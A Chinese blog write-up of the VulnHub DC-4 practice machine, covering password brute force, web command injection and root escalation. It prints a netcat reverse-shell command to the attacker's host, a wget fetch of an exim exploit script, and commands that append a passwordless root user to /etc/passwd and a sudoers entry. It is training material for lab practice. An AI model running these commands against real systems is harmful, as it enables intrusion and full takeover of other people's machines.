Vulnhub_DC-4靶机渗透测试

已于 2024-08-04 13:05:29 修改
阅读量163 收藏
点赞数 1
分类专栏: Vulnhub渗透测试靶场 文章标签: 网络 linux 网络安全 web安全 笔记
于 2023-09-20 12:01:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66225311/article/details/133072639
版权

DC-4

DC: 4 ~ VulnHub

文章目录

信息收集

  1. 使用nmap扫描出靶机所处192.168.78.153网段 再扫描一下细致的内容,发现开放80网站和22 ssh端口。感觉多半要获取用户名和密码来进行ssh连接了

image-20230621210512417

web渗透

  1. 访问网站,是一个登录窗,根据标题给出admin提示,感觉用户名就是admin了,查看了一圈没有什么提示,看来多半要爆破密码了

image-20230621220952680

  1. 由web 1靶机给出的经验,再使用dirb扫描一下,很好,直接进行爆破
image-20230621221118833
  1. 输入参数提交抓包,发送到攻击模块,加载弱密码文件,进行爆破,得出密码为happy
image-20230621221213234
  1. 登录之后,发现有几个功能,执行了之后发现都是Linux系统命令,没有能输入命令的地方,灵机一动抓包会不会显示命令执行语句呢
image-20230621221334273

漏洞利用

  1. 正如所料,还真能抓包查看到执行命令,那就开始修改命令查看是否可行 传入id发现成功返回 出现了rce命令执行漏洞

image-20230621221428298

  1. 既然能直接执行系统命令,那就直接使用 nc 将当前web用户的shell反弹到虚拟机上,输入nc -e /binbash 192.168.78.145 7777

image-20230621221608398

image-20230621221623857

  1. 当然第一反应也想到写入一个木马文件,但尝试发现失败了,在kali里面尝试写入,发现参数没有了。在burp写入连文件都没有创建,可能权限不够吧

image-20230621221745449

image-20230621221750143

漏洞利用 获取shell

  1. 将反弹的shell转换成交互式shell
 python -c 'import pty; pty.spawn("/bin/bash")'
 /usr/bin/script -qc /bin/bash /dev/null
  1. 先来到home文件下,查看有没有什么文件可以查看

image-20230621221919392

  1. 查看一下etc/passwd,发现一共有三个用户为1000以上的,看来少不了ssh切换用户了

image-20230622162133655

  1. 查看了一圈文件发现jim文件夹内有一个备份的密码

image-20230621222102998

提升权限1

  1. 使用find命令查找suid提权find / -user root -perm -4000 -print 2>/dev/null 发现了一个exim4,之前有用过这个提权,查看一下版本为
find / -user root -perm -4000 -print 2>/dev/null

image-20230622161822835

  1. 查看版本为4.89,似乎正好可以进行本地提权的漏洞版本之间的

image-20230622162159874

  1. searchsploit exim查找可利用的提权POC 找到目标

image-20230622162344092

  1. 将脚本保存到桌面 cp /usr/share/exploitdb/exploits/linux/local/46996.sh 1.sh

image-20230622162719986

  1. 查看POC的文件尾格式,发现依旧是windows版本,修改成Linux版本

image-20230622162857945

  1. 将脚本文件导入到/var/www/html中,使用wget下载提权脚本到目标机中
启动阿帕奇服务  sudo service apache2 start
cp 1.sh /var/www/html/1.sh
chmod 777 1.sh
wget http://192.168.78.128/1.sh

image-20230622164555598

  1. 执行脚本提权查看

image-20230622164717019

  1. 查看flag文件

image-20230622164739386

权限提升2

  1. 除了使用exim4进行suid提权,还有先前信息收集发现的一个密码字典
    在这里插入图片描述

  2. 尝试爆破jim用户ssh密码,成功切换用户
    在这里插入图片描述

  3. 查看mbox文件内容,发现内容是一封邮件
    在这里插入图片描述

  4. 前去查看mail目录,查看有没有邮件,发现其中给了用户的密码。切换用户登录
    在这里插入图片描述

  5. 使用suid -l 查看当前用户具有的权限 发现可以不需要密码就能使用root权限去执行 /usr/bin/teehee

image-20230621223024678

  1. 搜索发现和tee命令的sudo提权差不多,将数据可以写入到任意文件中,相当于具有任意文件可写权限。这就难免要想到DC-9靶机可以写入/etc/passwd账号密码,也可以写入/etc/sudoers 另账号具有所有的root权限

image-20230622155114052
7. 先尝试直接添加具有root权限的空密码用户到/etc/passwd中,su - sefs切换用户即可获得root权限

echo "sefs::0:0:::/bin/bash" | sudo /usr/bin/teehee -a /etc/passwd

在这里插入图片描述

  1. 接下来尝试写入到/etc/sudoers文件中提权。所以现在就进行将charles用户 提升为具有root权限
charles ALL=(ALL:ALL) ALL
echo "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers

image-20230622155542535

image-20230622161528121

  1. sudo -l 发现用户确实有了root权限。直接使用 sudo su来提升为root权限,输入密码即可

image-20230622161624689

  1. 获取flag

image-20230622161640490

靶机总结

本次的DC-4靶机感觉难度挺简单,至少是第一次直接从靶机打到了提权部分,没看wp,因为exim4漏洞POC有使用过,直接提权上到root。在进行常规提权的时候查看了一下邮件信息的文件 找到了隐藏密码

  1. 暴力破解登录网站
  2. shell命令执行直接反弹shell到kali上
  3. find 发现exim4提权POC suid提权
  4. wget 下载虚拟机网站的文件 无法上传文件到目标机上
  5. hydra对ssh登录爆破
  6. mbox邮件格式文件 /etc/mail 保存邮件信息
  7. 使用 --help查看teehee的用法
  8. 可以随意写入文件,可以尝试写入新账户root权限到/etc/passwd 可以将当前账号赋予所有的root权限 /etc/sudoers
echo "sefs::0:0:::/bin/bash" >> /etc/passwd
echo "charles ALL=(ALL:ALL) ALL" >> /etc/sudoers
生而逢时
关注
专栏目录
vulnhub】---DC-4靶机
qq_43168364的博客
08-21 2030
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1473
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
靶机 DC-4
m0_66299232的博客
09-19 363
hydra -L user.txt -P password.txt ssh://192.168.166.133 //-L,-P 都是大写。4.可以看到在/home/jim/backups目录下存在文件old-passwords.bak,可能是密码的备份文件。1.查看存活主机,根据分析得出 192.168.166.133是DC-4靶机IP地址。5.teehee这个root用户不需要密码就能登录,直接拿flag,轻松拿下4.发现了另外一个账户,并且文中有该账户的密码。既然我们获得了旧密码,也获得了账户。命令执行
DC-4靶机
weixin_45778886的博客
11-22 3764
下载安装 靶场下载地址:https://download.vulnhub.com/dc/DC-4.zip 信息收集 存后活主机探测 nmap -sP 192.168.124.0/24 端口服务探测 nmap -sS -A 192.168.124.24 目录扫描 dirb http://192.168.124.24 网站服务探测 访问网站,发现登录框,提示admin用户登录。 漏洞发现 爆破密码 法一: 使用 BP 进行爆破密码 1)准备密码本,没有可以使用 kali john工具的密码本,位置
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
dc-4靶机练习.docx
01-02
第一步;靶机web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
渗透测试靶机DC-4
prettyX的博客
12-06 518
开始 : ) 环境准备 靶机下载:http://www.five86.com 虚拟机:Virtual Box Kali 开始 看一下DC-4的介绍。 为初、中级选手准备,只有一个Flag,从技术上讲,有多个入口,没有线索。Go 靶机IP发现 nmap 尝试80访问 这里对登录页面做爆破,可以使用BurpSuite,这里使用hydra。 字典RockYo...
DC靶机系列:DC-4
Ays.Ie的博客
02-27 168
本篇文章为DC系列第4个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
066 渗透测试实战,靶机 DC-4
鸡蛋炒鸡蛋
04-29 455
文章目录一:环境准备 一:环境准备 下载:点我 下载之后完成安装,过程详情请参考,063 渗透测试实战,靶机 DC-1 打开DC-4
vulnhub DC-4 靶机 渗透测试
小松博客
05-21 184
尝试sudo -l查看可以使用的命令,发现没权执行sudo,然后又找了半天,在/var/mail找到了一个叫jim的文件,打开是一封信,里面有个密码^xHhA&hvim0y,发信人是Charles。设置用户名为admin,因为虽然我们不确定他的用户名百分百是admin,但是在网页内容上显示的是Admin Information Systems Login,借此我们可以假定用户名是admin。登陆进去以后,发现一个List file功能,可以列出文件列表,通过抓包发现他发送的是一个system命令。
vulnhub靶机DC-4
m0_52328368的博客
08-19 1205
vulnhubdc-4详细步骤
靶机实战-DC-4
滕财然的博客
02-26 348
DC-4靶机实战 文章目录DC-4靶机实战1、主机发现2、端口及端口详细信息扫描3、访问web服务(80端口)4、提权 这个靶机一开始扫不到IP,改一下虚拟机设置,然后重启就ok了 1、主机发现 目标IP为:192.168.232.168 2、端口及端口详细信息扫描 发现目标开放22、80端口 3、访问web服务(80端口) 只有一个登录框,没有验证码,尝试弱口令 弱口令无果,用bp爆破: ...
渗透测试学习之靶机DC-4
xdbzdgx的博客
11-18 3766
1.下载靶机 本篇文章是DC靶机系列的第四篇,针对的是靶机DC-4,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-4的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-4只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到ro
渗透DC-1靶机设计思路
最新发布
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值